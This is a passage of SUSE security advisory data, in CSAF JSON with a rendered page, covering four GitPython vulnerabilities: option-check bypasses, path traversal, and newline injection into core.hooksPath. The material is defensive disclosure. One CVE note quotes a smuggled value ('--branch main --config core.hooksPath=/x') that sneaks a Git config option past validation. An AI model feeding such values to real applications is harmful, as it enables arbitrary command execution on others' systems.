"product_id": "python314-GitPython-3.1.49-1.1.s390x"
}
}
],
"category": "architecture",
"name": "s390x"
},
{
"branches": [
{
"category": "product_version",
"name": "python311-GitPython-3.1.49-1.1.x86_64",
"product": {
"name": "python311-GitPython-3.1.49-1.1.x86_64",
"product_id": "python311-GitPython-3.1.49-1.1.x86_64"
}
},
{
"category": "product_version",
"name": "python313-GitPython-3.1.49-1.1.x86_64",
"product": {
"name": "python313-GitPython-3.1.49-1.1.x86_64",
"product_id": "python313-GitPython-3.1.49-1.1.x86_64"
}
},
{
"category": "product_version",
"name": "python314-GitPython-3.1.49-1.1.x86_64",
"product": {
"name": "python314-GitPython-3.1.49-1.1.x86_64",
"product_id": "python314-GitPython-3.1.49-1.1.x86_64"
}
}
],
"category": "architecture",
"name": "x86_64"
},
{
"branches": [
{
"category": "product_name",
"name": "openSUSE Tumbleweed",
"product": {
"name": "openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed",
"product_identification_helper": {
"cpe": "cpe:/o:opensuse:tumbleweed"
}
}
}
],
"category": "product_family",
"name": "SUSE Linux Enterprise"
}
],
"category": "vendor",
"name": "SUSE"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "python311-GitPython-3.1.49-1.1.aarch64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python311-GitPython-3.1.49-1.1.aarch64"
},
"product_reference": "python311-GitPython-3.1.49-1.1.aarch64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python311-GitPython-3.1.49-1.1.ppc64le as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python311-GitPython-3.1.49-1.1.ppc64le"
},
"product_reference": "python311-GitPython-3.1.49-1.1.ppc64le",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python311-GitPython-3.1.49-1.1.s390x as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python311-GitPython-3.1.49-1.1.s390x"
},
"product_reference": "python311-GitPython-3.1.49-1.1.s390x",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python311-GitPython-3.1.49-1.1.x86_64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python311-GitPython-3.1.49-1.1.x86_64"
},
"product_reference": "python311-GitPython-3.1.49-1.1.x86_64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python313-GitPython-3.1.49-1.1.aarch64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python313-GitPython-3.1.49-1.1.aarch64"
},
"product_reference": "python313-GitPython-3.1.49-1.1.aarch64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python313-GitPython-3.1.49-1.1.ppc64le as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python313-GitPython-3.1.49-1.1.ppc64le"
},
"product_reference": "python313-GitPython-3.1.49-1.1.ppc64le",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python313-GitPython-3.1.49-1.1.s390x as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python313-GitPython-3.1.49-1.1.s390x"
},
"product_reference": "python313-GitPython-3.1.49-1.1.s390x",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python313-GitPython-3.1.49-1.1.x86_64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python313-GitPython-3.1.49-1.1.x86_64"
},
"product_reference": "python313-GitPython-3.1.49-1.1.x86_64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python314-GitPython-3.1.49-1.1.aarch64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python314-GitPython-3.1.49-1.1.aarch64"
},
"product_reference": "python314-GitPython-3.1.49-1.1.aarch64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python314-GitPython-3.1.49-1.1.ppc64le as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python314-GitPython-3.1.49-1.1.ppc64le"
},
"product_reference": "python314-GitPython-3.1.49-1.1.ppc64le",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python314-GitPython-3.1.49-1.1.s390x as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python314-GitPython-3.1.49-1.1.s390x"
},
"product_reference": "python314-GitPython-3.1.49-1.1.s390x",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python314-GitPython-3.1.49-1.1.x86_64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python314-GitPython-3.1.49-1.1.x86_64"
},
"product_reference": "python314-GitPython-3.1.49-1.1.x86_64",
"relates_to_product_reference": "openSUSE Tumbleweed"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2026-42215",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-42215"
}
],
"notes": [
{
"category": "general",
"text": "GitPython is a python library used to interact with Git repositories. From version 3.1.30 to before version 3.1.47, GitPython blocks dangerous Git options such as --upload-pack and --receive-pack by default, but the equivalent Python kwargs upload_pack and receive_pack bypass that check. If an application passes attacker-controlled kwargs into Repo.clone_from(), Remote.fetch(), Remote.pull(), or Remote.push(), this leads to arbitrary command execution even when allow_unsafe_options is left at its default value of False. This issue has been patched in version 3.1.47.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:python311-GitPython-3.1.49-1.1.aarch64",
"openSUSE Tumbleweed:python311-GitPython-3.1.49-1.1.ppc64le",
"openSUSE Tumbleweed:python311-GitPython-3.1.49-1.1.s390x",
"openSUSE Tumbleweed:python311-GitPython-3.1.49-1.1.x86_64",
"openSUSE Tumbleweed:python313-GitPython-3.1.49-1.1.aarch64",
"openSUSE Tumbleweed:python313-GitPython-3.1.49-1.1.ppc64le",
"openSUSE Tumbleweed:python313-GitPython-3.1.49-1.1.s390x",
"openSUSE Tumbleweed:python313-GitPython-3.1.49-1.1.x86_64",
"openSUSE Tumbleweed:python314-GitPython-3.1.49-1.1.aarch64",
"openSUSE Tumbleweed:python314-GitPython-3.1.49-1.1.ppc64le",
"openSUSE Tumbleweed:python314-GitPython-3.1.49-1.1.s390x",
"openSUSE Tumbleweed:python314-GitPython-3.1.49-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-42215",
"url": "https://www.suse.com/security/cve/CVE-2026-42215"
},
{
"category": "external",
"summary": "SUSE Bug 1264604 for CVE-2026-42215",
"url": "https://bugzilla.suse.com/1264604"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:python311-GitPython-3.1.49-1.1.aarch64",
"openSUSE Tumbleweed:python311-GitPython-3.1.49-1.1.ppc64le",
"openSUSE Tumbleweed:python311-GitPython-3.1.49-1.1.s390x",
"openSUSE Tumbleweed:python311-GitPython-3.1.49-1.1.x86_64",
"openSUSE Tumbleweed:python313-GitPython-3.1.49-1.1.aarch64",
"openSUSE Tumbleweed:python313-GitPython-3.1.49-1.1.ppc64le",
"openSUSE Tumbleweed:python313-GitPython-3.1.49-1.1.s390x",
"openSUSE Tumbleweed:python313-GitPython-3.1.49-1.1.x86_64",
"openSUSE Tumbleweed:python314-GitPython-3.1.49-1.1.aarch64",
"openSUSE Tumbleweed:python314-GitPython-3.1.49-1.1.ppc64le",
"openSUSE Tumbleweed:python314-GitPython-3.1.49-1.1.s390x",
"openSUSE Tumbleweed:python314-GitPython-3.1.49-1.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 8.8,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"openSUSE Tumbleweed:python311-GitPython-3.1.49-1.1.aarch64",
"openSUSE Tumbleweed:python311-GitPython-3.1.49-1.1.ppc64le",
"openSUSE Tumbleweed:python311-GitPython-3.1.49-1.1.s390x",
"openSUSE Tumbleweed:python311-GitPython-3.1.49-1.1.x86_64",
"openSUSE Tumbleweed:python313-GitPython-3.1.49-1.1.aarch64",
"openSUSE Tumbleweed:python313-GitPython-3.1.49-1.1.ppc64le",
"openSUSE Tumbleweed:python313-GitPython-3.1.49-1.1.s390x",
"openSUSE Tumbleweed:python313-GitPython-3.1.49-1.1.x86_64",
"openSUSE Tumbleweed:python314-GitPython-3.1.49-1.1.aarch64",
"openSUSE Tumbleweed:python314-GitPython-3.1.49-1.1.ppc64le",
"openSUSE Tumbleweed:python314-GitPython-3.1.49-1.1.s390x",
"openSUSE Tumbleweed:python314-GitPython-3.1.49-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-05-12T00:00:00Z",
"details": "important"
}
],
"title": "CVE-2026-42215"
},
{
"cve": "CVE-2026-44243",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-44243"
}
],
"notes": [
{
"category": "general",
"text": "GitPython is a python library used to interact with Git repositories. Prior to version 3.1.48, a vulnerability in GitPython allows attackers who can supply a crafted reference path to an application using GitPython to write, overwrite, move, or delete files outside the repository\u0027s .git directory via insufficient validation of reference paths in reference creation, rename, and delete operations. This issue has been patched in version 3.1.48.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:python311-GitPython-3.1.49-1.1.aarch64",
"openSUSE Tumbleweed:python311-GitPython-3.1.49-1.1.ppc64le",
"openSUSE Tumbleweed:python311-GitPython-3.1.49-1.1.s390x",
"openSUSE Tumbleweed:python311-GitPython-3.1.49-1.1.x86_64",
"openSUSE Tumbleweed:python313-GitPython-3.1.49-1.1.aarch64",
"openSUSE Tumbleweed:python313-GitPython-3.1.49-1.1.ppc64le",
"openSUSE Tumbleweed:python313-GitPython-3.1.49-1.1.s390x",
"openSUSE Tumbleweed:python313-GitPython-3.1.49-1.1.x86_64",
"openSUSE Tumbleweed:python314-GitPython-3.1.49-1.1.aarch64",
"openSUSE Tumbleweed:python314-GitPython-3.1.49-1.1.ppc64le",
"openSUSE Tumbleweed:python314-GitPython-3.1.49-1.1.s390x",
"openSUSE Tumbleweed:python314-GitPython-3.1.49-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-44243",
"url": "https://www.suse.com/security/cve/CVE-2026-44243"
},
{
"category": "external",
"summary": "SUSE Bug 1264606 for CVE-2026-44243",
"url": "https://bugzilla.suse.com/1264606"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:python311-GitPython-3.1.49-1.1.aarch64",
"openSUSE Tumbleweed:python311-GitPython-3.1.49-1.1.ppc64le",
"openSUSE Tumbleweed:python311-GitPython-3.1.49-1.1.s390x",
"openSUSE Tumbleweed:python311-GitPython-3.1.49-1.1.x86_64",
"openSUSE Tumbleweed:python313-GitPython-3.1.49-1.1.aarch64",
"openSUSE Tumbleweed:python313-GitPython-3.1.49-1.1.ppc64le",
"openSUSE Tumbleweed:python313-GitPython-3.1.49-1.1.s390x",
"openSUSE Tumbleweed:python313-GitPython-3.1.49-1.1.x86_64",
"openSUSE Tumbleweed:python314-GitPython-3.1.49-1.1.aarch64",
"openSUSE Tumbleweed:python314-GitPython-3.1.49-1.1.ppc64le",
"openSUSE Tumbleweed:python314-GitPython-3.1.49-1.1.s390x",
"openSUSE Tumbleweed:python314-GitPython-3.1.49-1.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:L/I:H/A:H",
"version": "3.1"
},
"products": [
"openSUSE Tumbleweed:python311-GitPython-3.1.49-1.1.aarch64",
"openSUSE Tumbleweed:python311-GitPython-3.1.49-1.1.ppc64le",
"openSUSE Tumbleweed:python311-GitPython-3.1.49-1.1.s390x",
"openSUSE Tumbleweed:python311-GitPython-3.1.49-1.1.x86_64",
"openSUSE Tumbleweed:python313-GitPython-3.1.49-1.1.aarch64",
"openSUSE Tumbleweed:python313-GitPython-3.1.49-1.1.ppc64le",
"openSUSE Tumbleweed:python313-GitPython-3.1.49-1.1.s390x",
"openSUSE Tumbleweed:python313-GitPython-3.1.49-1.1.x86_64",
"openSUSE Tumbleweed:python314-GitPython-3.1.49-1.1.aarch64",
"openSUSE Tumbleweed:python314-GitPython-3.1.49-1.1.ppc64le",
"openSUSE Tumbleweed:python314-GitPython-3.1.49-1.1.s390x",
"openSUSE Tumbleweed:python314-GitPython-3.1.49-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-05-12T00:00:00Z",
"details": "moderate"
}
],
"title": "CVE-2026-44243"
},
{
"cve": "CVE-2026-44244",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-44244"
}
],
"notes": [
{
"category": "general",
"text": "GitPython is a python library used to interact with Git repositories. Prior to version 3.1.49, GitConfigParser.set_value() passes values to Python\u0027s configparser without validating for newlines. GitPython\u0027s own _write() converts embedded newlines into indented continuation lines (e.g. \\n becomes \\n\\t), but Git still accepts an indented [core] stanza as a section header - so the injected core.hooksPath becomes effective configuration. Any Git operation that invokes hooks (commit, merge, checkout) will then execute scripts from the attacker-controlled path. This issue has been patched in version 3.1.49.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:python311-GitPython-3.1.49-1.1.aarch64",
"openSUSE Tumbleweed:python311-GitPython-3.1.49-1.1.ppc64le",
"openSUSE Tumbleweed:python311-GitPython-3.1.49-1.1.s390x",
"openSUSE Tumbleweed:python311-GitPython-3.1.49-1.1.x86_64",
"openSUSE Tumbleweed:python313-GitPython-3.1.49-1.1.aarch64",
"openSUSE Tumbleweed:python313-GitPython-3.1.49-1.1.ppc64le",
"openSUSE Tumbleweed:python313-GitPython-3.1.49-1.1.s390x",
"openSUSE Tumbleweed:python313-GitPython-3.1.49-1.1.x86_64",
"openSUSE Tumbleweed:python314-GitPython-3.1.49-1.1.aarch64",
"openSUSE Tumbleweed:python314-GitPython-3.1.49-1.1.ppc64le",
"openSUSE Tumbleweed:python314-GitPython-3.1.49-1.1.s390x",
"openSUSE Tumbleweed:python314-GitPython-3.1.49-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-44244",
"url": "https://www.suse.com/security/cve/CVE-2026-44244"
},
{
"category": "external",
"summary": "SUSE Bug 1264608 for CVE-2026-44244",
"url": "https://bugzilla.suse.com/1264608"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:python311-GitPython-3.1.49-1.1.aarch64",
"openSUSE Tumbleweed:python311-GitPython-3.1.49-1.1.ppc64le",
"openSUSE Tumbleweed:python311-GitPython-3.1.49-1.1.s390x",
"openSUSE Tumbleweed:python311-GitPython-3.1.49-1.1.x86_64",
"openSUSE Tumbleweed:python313-GitPython-3.1.49-1.1.aarch64",
"openSUSE Tumbleweed:python313-GitPython-3.1.49-1.1.ppc64le",
"openSUSE Tumbleweed:python313-GitPython-3.1.49-1.1.s390x",
"openSUSE Tumbleweed:python313-GitPython-3.1.49-1.1.x86_64",
"openSUSE Tumbleweed:python314-GitPython-3.1.49-1.1.aarch64",
"openSUSE Tumbleweed:python314-GitPython-3.1.49-1.1.ppc64le",
"openSUSE Tumbleweed:python314-GitPython-3.1.49-1.1.s390x",
"openSUSE Tumbleweed:python314-GitPython-3.1.49-1.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.8,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"openSUSE Tumbleweed:python311-GitPython-3.1.49-1.1.aarch64",
"openSUSE Tumbleweed:python311-GitPython-3.1.49-1.1.ppc64le",
"openSUSE Tumbleweed:python311-GitPython-3.1.49-1.1.s390x",
"openSUSE Tumbleweed:python311-GitPython-3.1.49-1.1.x86_64",
"openSUSE Tumbleweed:python313-GitPython-3.1.49-1.1.aarch64",
"openSUSE Tumbleweed:python313-GitPython-3.1.49-1.1.ppc64le",
"openSUSE Tumbleweed:python313-GitPython-3.1.49-1.1.s390x",
"openSUSE Tumbleweed:python313-GitPython-3.1.49-1.1.x86_64",
"openSUSE Tumbleweed:python314-GitPython-3.1.49-1.1.aarch64",
"openSUSE Tumbleweed:python314-GitPython-3.1.49-1.1.ppc64le",
"openSUSE Tumbleweed:python314-GitPython-3.1.49-1.1.s390x",
"openSUSE Tumbleweed:python314-GitPython-3.1.49-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-05-12T00:00:00Z",
"details": "important"
}
],
"title": "CVE-2026-44244"
}
]
}
SUSE-SU-2026:21813-1
Vulnerability from csaf_suse - Published: 2026-05-18 09:43 - Updated: 2026-05-18 09:43Summary
Security update for python-GitPython
Severity
Important
Notes
Title of the patch: Security update for python-GitPython
Description of the patch: This update for python-GitPython fixes the following issues
- CVE-2026-42215: command injection via Git options bypass (bsc#1264604).
- CVE-2026-42284: unsafe option check validates multi_options before shlex.split transforms it (bsc#1264605).
- CVE-2026-44243: path traversal in GitPython reference APIs allows arbitrary file write and delete outside the
repository (bsc#1264606).
- CVE-2026-44244: newline injection in config_writer().set_value() enables RCE via core.hooksPath (bsc#1264608).
Patchnames: SUSE-SLES-16.0-775
Terms of use: CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).
8.8 (High)
Affected products
Recommended
2 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: SUSE Linux Enterprise Server 16.0:python313-GitPython-3.1.44-160000.3.1.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Server for SAP applications 16.0:python313-GitPython-3.1.44-160000.3.1.noarch | — |
Vendor Fix
|
Threats
Impact
important
8.1 (High)
Affected products
Recommended
2 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: SUSE Linux Enterprise Server 16.0:python313-GitPython-3.1.44-160000.3.1.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Server for SAP applications 16.0:python313-GitPython-3.1.44-160000.3.1.noarch | — |
Vendor Fix
|
Threats
Impact
important
6.5 (Medium)
Affected products
Recommended
2 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: SUSE Linux Enterprise Server 16.0:python313-GitPython-3.1.44-160000.3.1.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Server for SAP applications 16.0:python313-GitPython-3.1.44-160000.3.1.noarch | — |
Vendor Fix
|
Threats
Impact
moderate
7.8 (High)
Affected products
Recommended
2 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: SUSE Linux Enterprise Server 16.0:python313-GitPython-3.1.44-160000.3.1.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Server for SAP applications 16.0:python313-GitPython-3.1.44-160000.3.1.noarch | — |
Vendor Fix
|
Threats
Impact
important
References
20 references
{
"document": {
"aggregate_severity": {
"namespace": "https://www.suse.com/support/security/rating/",
"text": "important"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright 2024 SUSE LLC. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "Security update for python-GitPython",
"title": "Title of the patch"
},
{
"category": "description",
"text": "This update for python-GitPython fixes the following issues\n\n- CVE-2026-42215: command injection via Git options bypass (bsc#1264604).\n- CVE-2026-42284: unsafe option check validates multi_options before shlex.split transforms it (bsc#1264605).\n- CVE-2026-44243: path traversal in GitPython reference APIs allows arbitrary file write and delete outside the\n repository (bsc#1264606).\n- CVE-2026-44244: newline injection in config_writer().set_value() enables RCE via core.hooksPath (bsc#1264608).\n",
"title": "Description of the patch"
},
{
"category": "details",
"text": "SUSE-SLES-16.0-775",
"title": "Patchnames"
},
{
"category": "legal_disclaimer",
"text": "CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).",
"title": "Terms of use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://www.suse.com/support/security/contact/",
"name": "SUSE Product Security Team",
"namespace": "https://www.suse.com/"
},
"references": [
{
"category": "external",
"summary": "SUSE ratings",
"url": "https://www.suse.com/support/security/rating/"
},
{
"category": "self",
"summary": "URL of this CSAF notice",
"url": "https://ftp.suse.com/pub/projects/security/csaf/suse-su-2026_21813-1.json"
},
{
"category": "self",
"summary": "URL for SUSE-SU-2026:21813-1",
"url": "https://www.suse.com/support/update/announcement/2026/suse-su-202621813-1/"
},
{
"category": "self",
"summary": "E-Mail link for SUSE-SU-2026:21813-1",
"url": "https://lists.suse.com/pipermail/sle-updates/2026-May/046800.html"
},
{
"category": "self",
"summary": "SUSE Bug 1264604",
"url": "https://bugzilla.suse.com/1264604"
},
{
"category": "self",
"summary": "SUSE Bug 1264605",
"url": "https://bugzilla.suse.com/1264605"
},
{
"category": "self",
"summary": "SUSE Bug 1264606",
"url": "https://bugzilla.suse.com/1264606"
},
{
"category": "self",
"summary": "SUSE Bug 1264608",
"url": "https://bugzilla.suse.com/1264608"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-42215 page",
"url": "https://www.suse.com/security/cve/CVE-2026-42215/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-42284 page",
"url": "https://www.suse.com/security/cve/CVE-2026-42284/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-44243 page",
"url": "https://www.suse.com/security/cve/CVE-2026-44243/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-44244 page",
"url": "https://www.suse.com/security/cve/CVE-2026-44244/"
}
],
"title": "Security update for python-GitPython",
"tracking": {
"current_release_date": "2026-05-18T09:43:07Z",
"generator": {
"date": "2026-05-18T09:43:07Z",
"engine": {
"name": "cve-database.git:bin/generate-csaf.pl",
"version": "1"
}
},
"id": "SUSE-SU-2026:21813-1",
"initial_release_date": "2026-05-18T09:43:07Z",
"revision_history": [
{
"date": "2026-05-18T09:43:07Z",
"number": "1",
"summary": "Current version"
}
],
"status": "final",
"version": "1"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_version",
"name": "python313-GitPython-3.1.44-160000.3.1.noarch",
"product": {
"name": "python313-GitPython-3.1.44-160000.3.1.noarch",
"product_id": "python313-GitPython-3.1.44-160000.3.1.noarch"
}
}
],
"category": "architecture",
"name": "noarch"
},
{
"branches": [
{
"category": "product_name",
"name": "SUSE Linux Enterprise Server 16.0",
"product": {
"name": "SUSE Linux Enterprise Server 16.0",
"product_id": "SUSE Linux Enterprise Server 16.0",
"product_identification_helper": {
"cpe": "cpe:/o:suse:sles:16:16.0:server"
}
}
},
{
"category": "product_name",
"name": "SUSE Linux Enterprise Server for SAP applications 16.0",
"product": {
"name": "SUSE Linux Enterprise Server for SAP applications 16.0",
"product_id": "SUSE Linux Enterprise Server for SAP applications 16.0",
"product_identification_helper": {
"cpe": "cpe:/o:suse:sles:16:16.0:server-sap"
}
}
}
],
"category": "product_family",
"name": "SUSE Linux Enterprise"
}
],
"category": "vendor",
"name": "SUSE"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "python313-GitPython-3.1.44-160000.3.1.noarch as component of SUSE Linux Enterprise Server 16.0",
"product_id": "SUSE Linux Enterprise Server 16.0:python313-GitPython-3.1.44-160000.3.1.noarch"
},
"product_reference": "python313-GitPython-3.1.44-160000.3.1.noarch",
"relates_to_product_reference": "SUSE Linux Enterprise Server 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python313-GitPython-3.1.44-160000.3.1.noarch as component of SUSE Linux Enterprise Server for SAP applications 16.0",
"product_id": "SUSE Linux Enterprise Server for SAP applications 16.0:python313-GitPython-3.1.44-160000.3.1.noarch"
},
"product_reference": "python313-GitPython-3.1.44-160000.3.1.noarch",
"relates_to_product_reference": "SUSE Linux Enterprise Server for SAP applications 16.0"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2026-42215",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-42215"
}
],
"notes": [
{
"category": "general",
"text": "GitPython is a python library used to interact with Git repositories. From version 3.1.30 to before version 3.1.47, GitPython blocks dangerous Git options such as --upload-pack and --receive-pack by default, but the equivalent Python kwargs upload_pack and receive_pack bypass that check. If an application passes attacker-controlled kwargs into Repo.clone_from(), Remote.fetch(), Remote.pull(), or Remote.push(), this leads to arbitrary command execution even when allow_unsafe_options is left at its default value of False. This issue has been patched in version 3.1.47.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Server 16.0:python313-GitPython-3.1.44-160000.3.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:python313-GitPython-3.1.44-160000.3.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-42215",
"url": "https://www.suse.com/security/cve/CVE-2026-42215"
},
{
"category": "external",
"summary": "SUSE Bug 1264604 for CVE-2026-42215",
"url": "https://bugzilla.suse.com/1264604"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Server 16.0:python313-GitPython-3.1.44-160000.3.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:python313-GitPython-3.1.44-160000.3.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 8.8,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Server 16.0:python313-GitPython-3.1.44-160000.3.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:python313-GitPython-3.1.44-160000.3.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-05-18T09:43:07Z",
"details": "important"
}
],
"title": "CVE-2026-42215"
},
{
"cve": "CVE-2026-42284",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-42284"
}
],
"notes": [
{
"category": "general",
"text": "GitPython is a python library used to interact with Git repositories. Prior to version 3.1.47, _clone() validates multi_options as the original list, then executes shlex.split(\" \".join(multi_options)). A string like \"--branch main --config core.hooksPath=/x\" passes validation (starts with --branch), but after split becomes [\"--branch\", \"main\", \"--config\", \"core.hooksPath=/x\"]. Git applies the config and executes attacker hooks during clone. This issue has been patched in version 3.1.47.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Server 16.0:python313-GitPython-3.1.44-160000.3.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:python313-GitPython-3.1.44-160000.3.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-42284",
"url": "https://www.suse.com/security/cve/CVE-2026-42284"
},
{
"category": "external",
"summary": "SUSE Bug 1264605 for CVE-2026-42284",
"url": "https://bugzilla.suse.com/1264605"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Server 16.0:python313-GitPython-3.1.44-160000.3.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:python313-GitPython-3.1.44-160000.3.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 8.1,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Server 16.0:python313-GitPython-3.1.44-160000.3.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:python313-GitPython-3.1.44-160000.3.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-05-18T09:43:07Z",
"details": "important"
}
],
"title": "CVE-2026-42284"
},
{
"cve": "CVE-2026-44243",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-44243"
}
],
"notes": [
{
"category": "general",
"text": "GitPython is a python library used to interact with Git repositories. Prior to version 3.1.48, a vulnerability in GitPython allows attackers who can supply a crafted reference path to an application using GitPython to write, overwrite, move, or delete files outside the repository\u0027s .git directory via insufficient validation of reference paths in reference creation, rename, and delete operations. This issue has been patched in version 3.1.48.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Server 16.0:python313-GitPython-3.1.44-160000.3.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:python313-GitPython-3.1.44-160000.3.1.noarch"
]
},
"references": [
{
"category": "external",
